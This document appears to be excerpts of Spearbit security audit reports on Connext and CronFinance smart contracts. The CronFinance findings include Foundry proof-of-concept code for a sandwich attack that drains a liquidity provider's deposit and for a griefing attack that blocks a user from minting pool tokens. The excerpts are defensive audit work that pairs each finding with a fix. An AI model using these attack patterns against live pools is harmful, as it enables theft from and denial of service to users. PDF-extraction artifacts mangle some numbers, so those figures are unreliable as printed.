an adopted asset <> nomad local asset (i.e. POS USDC <> * this domain (the nomad local asset). * @dev Swaps for an adopted asset <> nomad local asset (i.e. POS USDC <> ,! ConnectorManager.sol:11: * @dev Each nomad router contract has a `XappConnectionClient`, which ,! references a 142 Recommendation: Doublecheck the references to Nomad. Connext: Solved in PR 2216. Spearbit: Verified. +5.5.72 Document usage of Nomad domain schema Severity: Informational Context: LibConnextStorage.sol#L49-L50, BridgeFacet.sol#L258, BridgeFacet.sol#L291, IXReceiver.sol#L5 Description: The library LibConnextStorage specifies that the domains are compatible with the nomad domain schema. However other locations don't mention this. This is especially important during the enrollment of new domains. * @param originDomain - The originating domain (i.e. where `xcall` is called). Must match nomad domain schema ,! * @param destinationDomain - The final domain (i.e. where `execute` / `reconcile` are called). Must match nomad domain schema ,! struct TransferInfo { uint32 originDomain; uint32 destinationDomain; ... } Recommendation: Where relevant document the domain schema. This should include xcall(), xcallIntoLo- cal(), xReceive(). Connext: Acknowledged. Spearbit: Acknowledged. +5.5.73 Router has multiple meanings Severity: Informational Context: RoutersFacet.sol#L16, LibConnextStorage.sol#L18, InboxFacet.sol#L217 Description: The term router is used for three different concepts. This is confusing for maintainers and readers of the code: A) The router that provides Liquidity and signs bids * `router` - this is the address that will sign bids sent to the sequencer B) The router that can add new routers of type A (B is a role and the address could be a multisig) /// @notice Enum representing address role enum Role { None, Router, Watcher, Admin } C) The router that what previously was BridgeRouter or xApp Router: * @param _router The address of the potential remote xApp Router Recommendation: Change the names to make them more clear, for example: • A Router -> LiquidityRouter • B Router -> LiquidityRouterWhitelistManager 143 • C Router -> XappRouter Connext: Solved in PR 2500. Spearbit: Verified. +5.5.74 Robustness of receiving contract Severity: Informational Context: BridgeFacet.sol#L785-L840, BridgeFacet.sol#L756-L770 Description: In the _reconciled branch of the code, the functions _handleExecuteTransaction(), _execute- Calldata() and excessivelySafeCall() don't revert when the underlying call reverts This seems to be inten- tional. This underlying revert can happen if there is a bug in the underlying call or if insufficient gas is supplied by the relayer. Note: if a delegate address is specified it can retry the call to try and fix temporary issues. The receiving contract already has received the tokens via handleOutgoingAsset() so must be prepared to handle these tokens. This should be explicitly documented. function _handleExecuteTransaction(...) ... { AssetLogic.handleOutgoingAsset(_asset, _args.params.to, _amountOut); _executeCalldata(_transferId, _amountOut, _asset, _reconciled, _args.params); ... } function _executeCalldata(...) ... { if (_reconciled) { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(...); } else { ... } } Recommendation: Document that the called contract must be so robust it can handle received tokens, even when its function reverts. Connext: Acknowledged. Spearbit: Acknowledged. +5.5.75 Functions can be combined Severity: Informational Context: BridgeFacet.sol#L258-L322 Description: Both xcall and xcallIntoLocal have same code except receiveLocal (which is set false for xcall and true for xcallIntoLocal) value. Instead of having these as separate function, a single function can be created which can tweak the functionalities of xcall and xcallIntoLocal on basis of receiveLocal value Recommendation: Remove the xcallIntoLocal function and revise the xcall function as below: 144 function xcall( uint32 _destination, address _to, address _asset, address _delegate, uint256 _amount, uint256 _slippage, bytes calldata _callData, bool _receiveLocal ) external payable returns (bytes32) { ... receiveLocal: _receiveLocal, ... } Connext: We chose to not clutter the xcall interface with this param. Spearbit: Acknowledged. +5.5.76 Document source of zeroHashes Severity: Informational Context: Merkle.sol#L173-L241 Description: The hashes which are used in function zeroHashes() are not explained, which makes it more difficult to understand and verify the code. function zeroHashes() internal pure returns (bytes32[TREE_DEPTH] memory _zeroes) { ... // keccak256 zero hashes bytes32 internal constant Z_0 = hex"0000000000000000000000000000000000000000000000000000000000000000"; ... bytes32 internal constant Z_31 = hex"8448818bb4ae4562849e949e17ac16e0be16688e156b5cf15e098c627c0056a9"; ,! ,! } Recommendation: Document where the constants are derived from. Here is an algorithm that generates them: //SPDX-License-Identifier: MIT pragma solidity 0.8.13; import "hardhat/console.sol"; contract Generate { uint constant DEPOSIT_CONTRACT_TREE_DEPTH = 32; bytes32[DEPOSIT_CONTRACT_TREE_DEPTH] zero_hashes; constructor() { console.logBytes32(zero_hashes[0]); // Compute hashes in empty sparse Merkle tree for (uint height = 0; height < DEPOSIT_CONTRACT_TREE_DEPTH - 1; height++) { zero_hashes[height + 1] = keccak256(abi.encodePacked(zero_hashes[height], ,! zero_hashes[height])); console.logBytes32(zero_hashes[height + 1]); } } } Or use this as documentation: 145 // keccak256 zero hashes bytes32 internal constant bytes32 internal constant ... bytes32 internal constant Z_31 = keccak256(abi.encodePacked(Z_30, Z_30)); } Z_0 = bytes32(0); Z_1 = keccak256(abi.encodePacked( Z_0, Z_0)); Or this: Z_i represent the hash values at different heights for a binary tree with leaf values equal to `0`. Z_i = keccak256(abi.encodePacked(Z_{i-1}, Z_{i-1})); Also add a reference in the comments to the verification of the original code. Connext: Solved in PR 2211. Spearbit: Verified. +5.5.77 Document underflow/overflows in TypedMemView Severity: Informational Context: TypedMemView.sol#L559-L582, TypedMemView.sol#L204-L210 == 32 and function leftMask() has an un- Description: The function index() has an overflow when _bytes derflow when _len == 0. These two compensate each other so the end result of index() is as expected. As the special case for _bytes == 0 is also handled, we assume this is intentional. However this behavior isn't mentioned in the comments, while other underflow/overflows are documented. library TypedMemView { function index( bytes29 memView, uint256 _index, uint8 _bytes ) internal pure returns (bytes32 result) { ... unchecked { uint8 bitLength = _bytes * 8; } ... } function leftMask(uint8 _len) private pure returns (uint256 mask) { ... mask := sar( sub(_len, 1), ... ... ) } } Recommendation: Add comments about underflow/overflows, for example on the following locations: 146 library TypedMemView { function index( bytes29 memView, uint256 _index, uint8 _bytes ) internal pure returns (bytes32 result) { ... unchecked { uint8 bitLength = _bytes * 8; // is 0 when _bytes == 32 } ... } function leftMask(uint8 _len) private pure returns (uint256 mask) { ... mask := sar( sub(_len, 1), ... ) ... // underflows when _len == 0 } } Connext: Acknowledged. Spearbit: Acknowledged. +5.5.78 Use while loops in dequeueVerified() Severity: Informational Context: Queue.sol#L59-L102 Description: Within function dequeueVerified() there are a few for loops that mention a variable as there first element. This is a null statement and can be removed. After removing, only a while condition remains. Replacing the for with a while would make the code more readable. Also (x >= y) can be replaced by (!(x < y)) or (!(y > x)) to save some gas. function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) { ... for (last; last >= first; ) { ... } ... for (first; first <= last; ) { ... } } Recommendation: Replace the for loops with while loops: -for (last; last >= first; ) { ... } +while (!(first > last)) { ... } Connext: Solved in PR PR 2228 and PR 2550. Spearbit: Verified. 147 +5.5.79 Duplicate functions in Encoding.sol Severity: Informational Context: Encoding.sol#L35-L74, TypedMemView.sol#L72-L168 Description: Encoding.sol defines a few functions already present in TypedMemView.sol: nibbleHex(), byte- Hex(), encodeHex(). Recommendation: Consider removing nibbleHex(), byteHex() and encodeHex() from both the files as custom errors can be used instead. Connext: Fixed in PR 2499. Spearbit: Verified. +5.5.80 Document about two MerkleTreeManager's Severity: Informational Context: messaging/Merkle.sol Description: On the hub domain (e.g. mainnet) there are two MerkleTreeManagers, one for the hub and one for the MainnetSpokeConnector. This might not be obvious to the casual readers of the code. Accidentally confusing the two would lead to weird issues. Recommendation: Add a comment in the code explaining there are two MerkleTreeManagers on the hub domain. Connext: Added a comment in PR 2438. Spearbit: Verified. +5.5.81 Match filename to contract name Severity: Informational Context: messaging/Merkle.sol#L11, messaging/libraries/Merkle.sol#L9, ProposedOwnable.sol#L28, Propose- dOwnable.sol#L176 OZERC20.sol#L48 Description: Sometimes the name of the .sol file is different than the contract name. Also sometimes multiple contracts are defined in the same file. Additionally there are multiple .sol files with the same name. This makes it more difficult to find the file containing the contract. File: messaging/Merkle.sol contract MerkleTreeManager is ProposedOwnableUpgradeable { ... } File: messaging/libraries/Merkle.sol library MerkleLib { ... } File: ProposedOwnable.sol abstract contract ProposedOwnable is IProposedOwnable { ... } abstract contract ProposedOwnableUpgradeable is Initializable, ProposedOwnable { ... } File: OZERC20.sol 148 contract ERC20 is IERC20, IERC20Permit, EIP712 { ... } Recommendation: Split up files containing multiple contracts and match the filename to the contract name. For example: • messaging/Merkle.sol => MerkleTreeManager.sol • messaging/libraries/Merkle.sol => MerkleLib.sol • ProposedOwnable.sol => split in ProposedOwnable.sol and ProposedOwnableUpgradeable.sol • OZERC20.sol => perhaps keep it because this based on an OpenZeppelin contract Connext: Solved in PR 2441. Spearbit: Verified. +5.5.82 Use uint40 for type in TypedMemView Severity: Informational Context: TypedMemView.sol#L347 Description: All internal functions in TypedMemView use uint40 for type except build(). Since internal functions can be called by inheriting contracts, it's better to provide a consistent interface. Recommendation: Change type from uint256 to uint40 in build() function build( - + uint256 _type, uint40 _type, uint256 _loc, uint256 _len Connext: Leaving as is in original library. Spearbit: Acknowledged. +5.5.83 Comment in function typeOf() is inaccurate Severity: Informational Context: TypedMemView.sol#L391 Description: A comment in function typeOf() is inaccurate. It says it is shifting 24 bytes, however it is shifting 216 / 8 = 27 bytes. function typeOf(bytes29 memView) internal pure returns (uint40 _type) { assembly { ... // 216 == 256 - 40 _type := shr(216, memView) // shift out lower 24 bytes } } Recommendation: Change the comment to -_type := shr(216, memView) // shift out lower 24 bytes +_type := shr(216, memView) // shift out lower 27 bytes 149 Connext: Solved in PR 2533. Spearbit: Verified. +5.5.84 Missing Natspec documentation in TypedMemView Severity: Informational Context: TypedMemView.sol#L802 Description: unsafeJoin()'s Natspec documentation is incomplete as the second argument to function is not documented. Recommendation: Add Natspec for the second argument _location. Here is a suggestion: @param _location The memory location from where the joined view begins. Connext: Solved in PR 2533. Spearbit: Verified. +5.5.85 Remove irrelevant comments Severity: Informational Context: TypedMemView.sol#L770, SpokeConnector.sol#L499, BridgeFacet.sol#L419 Description: • Instance 1 - TypedMemView.sol#L770 clone() has this comment that seems to be copied from equal(). This is not applicable to clone() and can be deleted. * @dev Shortcuts if the pointers are identical, otherwise compares type and digest. • Instance 2 - SpokeConnector.sol#L499 The function process of SpokeConnector contains comments that are no longer relevant. // check re-entrancy guard // require(entered == 1, "!reentrant"); // entered = 0; Instance 3 - BridgeFacet.sol#L419 Nomad is no longer used within Connext. However, they are still being mentioned in the comments within the codebase. * @notice Initiates a cross-chain transfer of funds, calldata, and/or various named properties using ,! the nomad * network. Recommendation: Remove or update comments that are no longer relevant. Connext: Solved in PR 2533. Spearbit: Verified. 150 +5.5.86 Incorrect comment about TypedMemView encoding Severity: Informational Context: TypedMemView.sol#L414 Description: A TypedMemView variable of type bytes29 is encoded as follows: • First 5 bytes encode a type flag. • Next 12 bytes point to a memory address. • Next 12 bytes encode the length of the memory view (in bytes). • Next 3 bytes are empty. When shifting a TypedMemView variable to the right by 15 bytes (120 bits), the encoded length and the empty bytes are removed. Hence, this comment is incorrect: // 120 bits = 12 bytes (the encoded loc) + 3 bytes (empty low space) _loc := and(shr(120, memView), _mask) Recommendation: Apply this diff: -// 120 bits = 12 bytes (the encoded loc) + 3 bytes (empty low space) +// 120 bits = 12 bytes (the encoded len) + 3 bytes (empty low space) Connext: Solved in PR 2533. Spearbit: Verified. +5.5.87 Constants can be used in assembly blocks directly Severity: Informational Context: ExcessivelySafeCall.sol#L127-L133, TypedMemView.sol#L411-L415, TypedMemView.sol#L443-L446 Description: Yul cannot read global variables, but that is not true for a constant variable as its value is embedded in the bytecode. Highlighted code above have the following pattern: uint256 _mask = LOW_12_MASK; // assembly can't use globals assembly { // solium-disable-previous-line no-inline-assembly _len := and(shr(24, memView), _mask) } Here, LOW_12_MASK is a constant which can be used directly in assembly code. Recommendation: Replace mask variables with the constant variables. Connext: TypedMemView.sol#L364, nomad-ExcessivelySafeCall.sol#L127 Leaving the same as in source libraries: summa-tx-TypedMemView.sol#L396, summa-tx- Spearbit: Acknowledged. Although the reason to variables for constants in the original library is because they support a wide range of solidity versions. Older versions did not support using constants directly in assembly. 151 +5.5.88 Document source of processMessageFromRoot() Severity: Informational Context: ArbitrumHubConnector.sol#L86-L117 Description: The function processMessageFromRoot() of ArbitrumHubConnector doesn't contain a comment where it is derived from. Most other functions have a link to the source. Linking to the source would make the function easier to verify and maintain. Recommendation: Add a comment where processMessageFromRoot() is derived from. This seems to be: • confirmNode() RollupCore.sol#L269-L285. • executeTransaction() Outbox.sol#L123-L147. Connext: Acknowledged. Spearbit: Acknowledged. +5.5.89 Be aware of zombies Severity: Informational Context: ArbitrumHubConnector.sol#L119-L138, Node.sol#L20-L23 Description: The function _validateSendRoot() of ArbitrumHubConnector check that stakerCount and child- StakerCount are larger than 0. The definition of stakerCount and childStakerCount document that they could include zombies. Its not immediately clear what zombies are, but it might be relevant to consider them. contract ArbitrumHubConnector is HubConnector { function _validateSendRoot(...) ... { ... require(node.stakerCount > 0 && node.childStakerCount > 0, "!staked"); } } // Number of stakers staked on this node. This includes real stakers and zombies uint64 stakerCount; // Number of stakers staked on a child node. This includes real stakers and zombies uint64 childStakerCount; Recommendation: Double check if zombies have to be taken into account. Connext: Zombies are stakers that have lost their disputes source We can check for zombies, but because the challenge periods don't align it doesn't fully protect us (i.e. because we don't wait the 7 days, a staker who wasn't a zombie could become one). Instead, we take the weaker assumption that someone has built on the node. Spearbit: Acknowledged. 152 +5.5.90 Readability of proveAndProcess() Severity: Informational Context: SpokeConnector.sol#L330-L365 Description: The function proveAndProcess() is relatively difficult to understand because it first processes for the case of i==0 and then does a loop over i==1..._proofs.length. function proveAndProcess(...) ... { ... bytes32 _messageHash = keccak256(_proofs[0].message); bytes32 _messageRoot = calculateMessageRoot(_messageHash, _proofs[0].path, _proofs[0].index); proveMessageRoot(_messageRoot, _aggregateRoot, _aggregatePath, _aggregateIndex); messages[_messageHash] = MessageStatus.Proven; for (uint32 i = 1; i < _proofs.length; ) { _messageHash = keccak256(_proofs[i].message); bytes32 _calculatedRoot = calculateMessageRoot(_messageHash, _proofs[i].path, _proofs[i].index); require(_calculatedRoot == _messageRoot, "!sharedRoot"); messages[_messageHash] = MessageStatus.Proven; unchecked { ++i; } } ... } Recommendation: Consider integrating the 0 case within the loop to make the code more readable. This example costs slightly more gas. Other variations that cost less gas are also possible but will likely make it less readable: function proveAndProcess(...) ... { ... bytes32 _messageHash; bytes32 _messageRoot; for (uint32 i = 0; i < _proofs.length; ) { _messageHash = keccak256(_proofs[i].message); bytes32 _calculatedRoot = calculateMessageRoot(_messageHash, _proofs[i].path, _proofs[i].index); if (i == 0) { proveMessageRoot(_calculatedRoot, _aggregateRoot, _aggregatePath, _aggregateIndex); _messageRoot = _calculatedRoot; } require(_calculatedRoot == _messageRoot, "!sharedRoot"); messages[_messageHash] = MessageStatus.Proven; unchecked { ++i; } } ... } Connext: Acknowledged. Spearbit: Acknowledged. 153 +5.5.91 Readability of checker() Severity: Informational Context: SendOutboundRootResolver.sol#L32-L42 Description: The function checker() is relatively difficult to read due to the else if chaining of if statements. As the if statements call return(), the else isn't necessary and the code can be made more readable. function checker() external view override returns (bool canExec, bytes memory execPayload) { bytes32 outboundRoot = CONNECTOR.outboundRoot(); if ((lastExecuted + EXECUTION_INTERVAL) > block.timestamp) { return (false, bytes("EXECUTION_INTERVAL seconds are not passed yet")); } else if (lastRootSent == outboundRoot) { return (false, bytes("Sent root is the same as the current root")); } else { execPayload = abi.encodeWithSelector(this.sendMessage.selector, outboundRoot); return (true, execPayload); } } Recommendation: Consider changing the code to something like this: function checker() external view override returns (bool canExec, bytes memory execPayload) { bytes32 outboundRoot = CONNECTOR.outboundRoot(); if ((lastExecuted + EXECUTION_INTERVAL) > block.timestamp) return (false, bytes("EXECUTION_INTERVAL seconds are not passed yet")); if (lastRootSent == outboundRoot) return (false, bytes("Sent root is the same as the current root")); execPayload = abi.encodeWithSelector(this.sendMessage.selector, outboundRoot); return (true, execPayload); } Connext: SendOutboundRootResolver.sol is removed in PR 2199. Spearbit: Verified. +5.5.92 Use function addressToBytes32 Severity: Informational Context: SpokeConnector.sol#L282-L289, TypeCasts.sol#L31-L33 Description: The function dispatch() of SpokeConnector contains an explicit conversion from address to bytes32. There is also a function addressToBytes32() that does the same and is more readable. function dispatch(...) ... { bytes memory _message = Message.formatMessage( ... bytes32(uint256(uint160(msg.sender))), ... ); Recommendation: Use function addressToBytes32: -bytes32(uint256(uint160(msg.sender))), +addressToBytes32(msg.sender), Connext: Fixed in PR 2522. Spearbit: Verified. 154 6 Appendix: Architecture 155 diff --git a/findings_newupdate/spearbit/CronFinance-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/CronFinance-Spearbit-Security-Review.txt new file mode 100644 index 0000000..3d225d0 --- /dev/null +++ b/findings_newupdate/spearbit/CronFinance-Spearbit-Security-Review.txt @@ -0,0 +1,36 @@ +5.1.1 Balancer Read-Only Reentrancy Vulnerability (Changes from dev team added to audit.) Severity: High Risk Context: CronV1Pool.sol#L1250 Description: Balancer's read-only reentrancy vulnerability potentially effects the following Cron-Fi TWAMM func- tions: • getVirtualReserves • getVirtualPriceOracle • executeVirtualOrdersToBlock A mitigation was provided by the Balancer team that uses a minimum amount of gas to trigger a reentrancy check. The Balancer vulnerability is discussed in greater detail here: • reentrancy-vulnerability-scope-expanded/4345 Recommendation: Install the mitigation into the aforementioned methods, changing them to non-view functions, but documenting that they do not meaningfully modify state. If possible, confirm that the mitigation is not needed by testing the methods without it and removing it if shown to not be a problem. Twamm: Addressed in commit 5a529da. Spearbit: Verified. +5.1.2 Overpayment of one side of LP Pair onJoinPool due to sandwich or user error Severity: High Risk Context: CronV1Pool.sol#L2048-L2051 Description: Only one of the two incoming tokens are used to determine the amount of pool tokens minted (amountLP) on join amountLP = Math.min( _token0InU112.mul(supplyLP).divDown(_token0ReserveU112), _token1InU112.mul(supplyLP).divDown(_token1ReserveU112) ); In the event the price moves between the time a minter sends their transaction and when it is included in a block, they may overpay for one of _token0InU112 or _token1InU112. This can occur due to user error, or due to being sandwiched. Concrete example: pragma solidity ^0.7.0; pragma experimental ABIEncoderV2; import "forge-std/Test.sol"; import "../HelperContract.sol"; import { C } from "../../Constants.sol"; import { ExecVirtualOrdersMem } from "../../Structs.sol"; contract JoinSandwich is HelperContract { uint256 WAD = 10**18; function testManualJoinSandwich() public { 5 address userA = address(this); address userB = vm.addr(1323); // Add some base liquidity from the future attacker. addLiquidity(pool, userA, userA, 10**7 * WAD, 10**7 * WAD, 0); assertEq(CronV1Pool(pool).balanceOf(userA), 10**7 * WAD - C.MINIMUM_LIQUIDITY); // Give userB some tokens to LP with. token0.transfer(userB, 1_000_000 * WAD); token1.transfer(userB, 1_000_000 * WAD); addLiquidity(pool, userB, userB, 10**6 * WAD, 10**6 * WAD, 0); assertEq(CronV1Pool(pool).balanceOf(userB), 10**6 * WAD); exit(10**6 * WAD, ICronV1Pool.ExitType(0), pool, userB); assertEq(CronV1Pool(pool).balanceOf(userB), 0); // Full amounts are returned b/c the exit penalty has been removed (as is being done anyway). assertEq(token0.balanceOf(userB), 1_000_000 * WAD); assertEq(token1.balanceOf(userB), 1_000_000 * WAD); // Now we'll do the same thing, simulating a sandwich from userA. uint256 swapProceeds = swapPoolAddr(5 * 10**6 * WAD, /* unused */ 0, ICronV1Pool.SwapType(0), address(token0), pool, ,! userA); // Original tx from userB is sandwiched now... addLiquidity(pool, userB, userB, 10**6 * WAD, 10**6 * WAD, 0); // Sell back what was gained from the first swap. swapProceeds = swapPoolAddr(swapProceeds, /* unused */ 0, ICronV1Pool.SwapType(0), address(token1), pool, userA); emit log_named_uint("swapProceeds 1 to 0", swapProceeds); // allows seeing what userA lost to fees // Let's see what poor userB gets back of their million token0 and million token1... assertEq(token0.balanceOf(userB), 0); assertEq(token1.balanceOf(userB), 0); exit(ICronV1Pool(pool).balanceOf(userB), ICronV1Pool.ExitType(0), pool, userB); emit log_named_uint("userB token0 after", token0.balanceOf(userB)); emit log_named_uint("userB token1 after", token1.balanceOf(userB)); } } Output: Logs: swapProceeds 1 to 0: 4845178856516554015932796 userB token0 after: 697176321467715374004199 userB token1 after: 687499999999999999999999 1. We have a pool where the attacker is all of the liquidity (107 of each token) 2. A LP tries to deposit another 106 in equal proportions 3. The attacker uses a swap of 5 (cid:3) 106 of one of the tokens to distort the pool. They lose about 155k in the process, but the LP loses far more, nearly all of which goes to the attacker--about 615,324 (sum of the losses of the two tokens since they're equally priced in this example). The attacker could be a significantly smaller proportion of the pool and still find this attack profitable. They could also JIT the liquidity since the early withdrawal penalty has been removed. The attack becomes infeasible for very large pools (has to happen over multiple TXs so can't flash loan --need own capital), but is relevant in practice. Recommendation: Allow LPs to specify slippage tolerance on both join and exit. An example of this is the 6 uniswap/v2-periphery/UniswapV2Router02.sol where slippage protection is added both when adding and removing liquidity. Twamm: Addressed in commit e0e5fb4. Followed recommendation for onJoin, adding minimum price arguments to allow users to specify asymmetric limits if desired. However, for the exit use case (i.e. an exit price attack), the existing Balancer scaffolding wrapping our pool provides a minimum exit amounts that reverts if at least a specified number of tokens is received. To ensure this works with our pool attack to illustrate that users can reject tracts/twault/test/auto/LiquidityAttackAuto.t.sol which manipulates price, specifies minimums and is reverted with BAL#505). loosely based on yours with a non-sensical price liquidation during undesirable price movements (see con- testAutoExitProtectedAgainstSandwichMovement, function I added a test Spearbit: Confirmed. +5.1.3 Loss of Long-Term Swap Proceeds Likely in Pools With Decimal or Price Imbalances Severity: High Risk Context: VirtualOrders.sol#L166 Description: This TWAMM implementation tracks the proceeds of long-term swaps efficiently via accumulated values called "scaled proceeds" for each token. In every order block interval (OBI), the scaled proceeds for e.g. the sale of token 0 are incremented by (quantity of token 1 purchased during the OBI) (cid:3)264= (sales rate of token 0 during the OBI) Then the proceeds of any specific long-term swap can be computed as the product of the difference between the scaled proceeds at the current block (or the expiration block of the order if filled) and the last block for which proceeds were claimed for the order and the order's sales rate, divided by 264: last := min(currentBlock, orderExpiryBlock) prev := block of last proceeds collection, or block order was placed in if this is the first withdrawal LT swap proceeds = (scaledProceedsl ast (cid:0) scaledProceedsprev ) (cid:3) (ordersalesrate)=264 The value 264 is referred to as the "scaling factor" and is intended to reduce precision loss in the division to determine the increment to the scaled proceeds. The addition to increment the scaled proceeds and the subtraction to compute its net change is both intentionally done with unchecked arithmetic--since only the difference matters, so long as at most one overflow occurs between claim-of-proceeds events for any given order, the computed proceeds will be correct (up to rounding errors). If two or more overflows occur, however, funds will be lost by the swapper (unclaimable and locked in the contract). Additionally, to cut down on gas costs, the scaled proceeds for the two tokens are packed into a single storage slot, so that only 128 bits are available for each value. This makes multiple overflows within the lifetime of a single order more likely. The CronFi team was aware of this at the start of the audit and specifically requested it be investigated, though they expected a maximum order length of 5 years to be sufficient to avoid the issue in practice. The scaling factor of 264 is approximately 1.8 (cid:3) 1019, close to the unit size of an 18-decimal token. It indeed works well if both pool tokens have similar decimals and relative prices that do not differ by too many orders of magnitude, as the quantity purchased and the sales rate will then be of similar magnitude, canceling to within a few powers of ten (2128 3.4 (cid:3) 1038, leaving around 19 orders of magnitude after accounting for the scaling factor). However, in pools with large disparities in price, decimals, or both, numerical issues are easy to encounter. The most extreme, realistic example would be a DAI-GUSD pool. DAI has 18 decimals while GUSD has only 2. We will treat the price of DAI and GUSD as equal for this analysis, as they are both stablecoins, and arbitrage of the TWAMM pool should prevent large deviations. Selling GUSD at a rate of 1000 per block, with an OBI of 64 (the stable pool order block interval in the audited commit) results in an increment of the scaled proceeds per OBI of: increment = (64 (cid:3) 1000 (cid:3) 1018) (cid:3) 264=(1000 (cid:3) 102) = 1.18 (cid:3) 1037 7 This will overflow an unsigned 128 bit integer after 29 OBIs; at 12 seconds per block, this means the first overflow occurs after 12 (cid:3) 64 (cid:3) 29 = 22272 seconds or about 6.2 hours, and thus the first double overflow (and hence irrevocable loss of proceeds if a withdrawal is not executed in time) will occur within about 12.4 hours (slightly but not meaningfully longer if the price is pushed a bit below 1:1, assuming a deep enough pool or reasonably efficient arbitrage). Since the TWAMM is intended to support swaps that take days, weeks, months, or even years to fill, without requiring constant vigilance from every long-term swapper, this is a strong violation of safety. A less extreme but more market-relevant example would be a DAI-WBTC pool. WBTC has 8 instead of 2 decimals, but it is also more than four orders of magnitude more valuable per token than DAI, making it only about 2 orders of magnitude "safer" than a DAI-GUSD pool. Imitating the above calculation with 20_000 DAI = 1 WBTC and selling 0.0025 WBTC (~$50) per block with a 257 block OBI yields: increment = (257 (cid:3) 50 (cid:3) 1018) (cid:3) 264=(0.0025 (cid:3) 108) = 9.48 (cid:3) 1035 OBI to overflow = ceiling(2128=(9.48 (cid:3) 1035)) = 359 time to overflow = 12 (cid:3) 257 (cid:3) 359 = 1107156 seconds = 307 hours = 12.8 days , or a little more than a day to encounter the second overflow. While less bad than the DAI-GUSD example, this is still likely of significant concern given that the CronFi team indicated these are parameters under which the TWAMM should be able to function safely and DAI-WBTC is a pair of interest for the v1 product. It is worth noting that these calculations are not directly dependent on the quantity being sold so long as the price stays roughly constant--any change in the selling rate will be compensated by a proportional change in the proceeds quantity as their ratio is determined by price. Thus the analysis depends only on relative price and relative decimals, to a good approximation--so a WBTC-DAI pool can be expected to experience an overflow roughly every two weeks at prevailing market prices, so long as the net selling rate is non-zero. Recommendation: Consider adjusting the scaling factor based on the relative decimals of the two tokens (this will result in two different scaling factors per pool). The lower the selling rate in absolute terms, the smaller the factor needed to avert serious precision loss. This is similar in effect to scaling all balances to, say, 18 decimals but should be simpler to implement. Highly imbalanced prices are still a risk, but these are unlikely to be as extreme as the differences that arise from unequal decimals. The scaling factor could be made configurable upon pool creation to allow an adjustment for price as well as decimals, although if prices diverge significantly after creation, there is likely no other option than abandoning a pool (as retroactively correcting scaled proceeds would be cost- prohibitive). Alternatively, separate 256-bit containers can be used to store scaled proceeds, although this will greatly increase the gas costs of virtual order execution. Twamm: Addressed in the following commits: faf1d5e, bfb6a5c, 162461a. Spearbit: Verified. +5.1.4 An attacker can block any address from joining the Pool and minting BLP Tokens by filling the joinEventMap mapping. Severity: High Risk Context: JoinEventLib.sol#L65-L137, Constants.sol#L112 Description: An attacker can block any address from minting BLP Tokens. This occurs due to the MAX_JOIN_- EVENTS limit, which is present in the JoinEventLib library. The goal for an attacker is to block a legitimate user from minting BLP Tokens, by filling the joinEventMap mapping. The attacker can fill the joinEventMap mapping by performing the following steps: • The attacker mints BLP Tokens from 50 different addresses. • Each address transfers the BLP Tokens, alongside the join events, to the user targeted with a call to the CronV1Pool(pool).transfer and CronV1Pool(pool).transferJoinEvent functions respectively. Those transfers should happen in different blocks. After 50 blocks (50 * 12s = 10 minutes) the attacker has blocked the legitimate user from minting _BLP Tokens_, as the maximum size of the joinEventMap‘ mapping has been reached. 8 The impact of this vulnerability can be significant, particularly for smart contracts that allow users to earn yield by providing liquidity in third-party protocols. For example, if a governance proposal is initiated to generate yield by providing liquidity in a CronV1Pool pool, the attacker could prevent the third-party protocol from integrating with the CronV1Pool protocol. A proof-of-concept exploit demonstrating this vulnerability can be found below: function testGriefingAttack() public { console.log("-----------------------------"); console.log("Many Users mint BLP tokens and transfer the join events to the user 111 in order to fill the array!"); ,! for (uint j = 1; j < 51; j++) { _addLiquidity(pool, address(j), address(j), 2_000, 2_000, 0); vm.warp(block.timestamp + 12); vm.startPrank(address(j)); //transfer the tokens CronV1Pool(pool).transfer(address(111), CronV1Pool(pool).balanceOf(address(j))); //transfer the join events to the address(111) CronV1Pool(pool).transferJoinEvent(address(111), 0 , CronV1Pool(pool).balanceOf(address(j))); vm.stopPrank(); } console.log("Balance of address(111) before minting LP Tokens himself", ,! ICronV1Pool(pool).balanceOf(address(111))); //user(111) wants to enter the pool _addLiquidity(pool, address(111), address(111), 5_000, 5_000, 0); console.log("Join Events of user address(111): ", ICronV1Pool(pool).getJoinEvents(address(111)).length); console.log("Balance of address(111) after adding the liquidity: ", ICronV1Pool(pool).balanceOf(address(111))); ,! ,! } Recommendation: A possible mitigation could be to override the _move function of the BalancerPoolToken con- tract by also transferring the joinEvents alongside the BLP tokens. Twamm: Join Event / Holding Period & Penalty complete removed in commit 3130e41. Spearbit: Verified. +5.1.5 The executeVirtualOrdersToBlock function updates the oracle with the wrong block.number Severity: High Risk Context: CronV1Pool.sol#L1130 Description: The executeVirtualOrdersToBlock is external, meaning anyone can call this function to execute virtual orders. The _maxBlock parameter can be lower block.number which will make the oracle malfunction as the oracle update function _updateOracle uses the block.timestamp and assumes that the update was called with the reserves at the current block. This will make the oracle update with an incorrect value when _maxBlock can be lower than block.number. Recommendation: Consider adding the block number as a parameter within the _updateOracle in order for this function to not rely on the current block. Twamm: Addressed in commit f324de7. 9 Spearbit: Verified. 5.2 Low Risk +5.2.1 The _join function does not check if the recipient is address(0) Severity: Low Risk Context: CronV1Pool.sol#L2055 Description: As stated within the Balancer's PoolBalances.sol // The Vault ignores the `recipient` in joins and the `sender` in exits: it is up to the Pool to keep track of ,! // their participation. The recipient is not checked if it's the address(0), that should happen within the pool implementation. Within the Cron implementation, this check is missing which can cause losses of LPs if the recipient is sent as address(0). This can have a high impact if a 3rd party integration happens with the Cron pool and the "joiner" is mistakenly sending an address(0). This becomes more dangerous if the 3rd party is a smart contract implementation that connects with the Cron pool, as the default value for an address is the address(0), so the probability of this issue occurring increases. Recommendation: Add a check for the recipient not to be address(0). Twamm: Addressed in commit 370a0d3a. Spearbit: Verified. +5.2.2 Canonical token pairs can be griefed by deploying new pools with malicious admins Severity: Low Risk Context: CronV1PoolFactory.sol#L63 Description: function create( address _token0, address _token1, string memory _name, string memory _symbol, uint256 _poolType, address _pauser ) external returns (address) { CronV1Pool.PoolType poolType = CronV1Pool.PoolType(_poolType); requireErrCode(_token0 != _token1, CronErrors.IDENTICAL_TOKEN_ADDRESSES); (address token0, address token1) = _token0 < _token1 ? (_token0, _token1) : (_token1, _token0); requireErrCode(token0 != address(0), CronErrors.ZERO_TOKEN_ADDRESSES); requireErrCode(getPool[token0][token1][_poolType] == address(0), CronErrors.EXISTING_POOL); address pool = address( new CronV1Pool(IERC20(_token0), 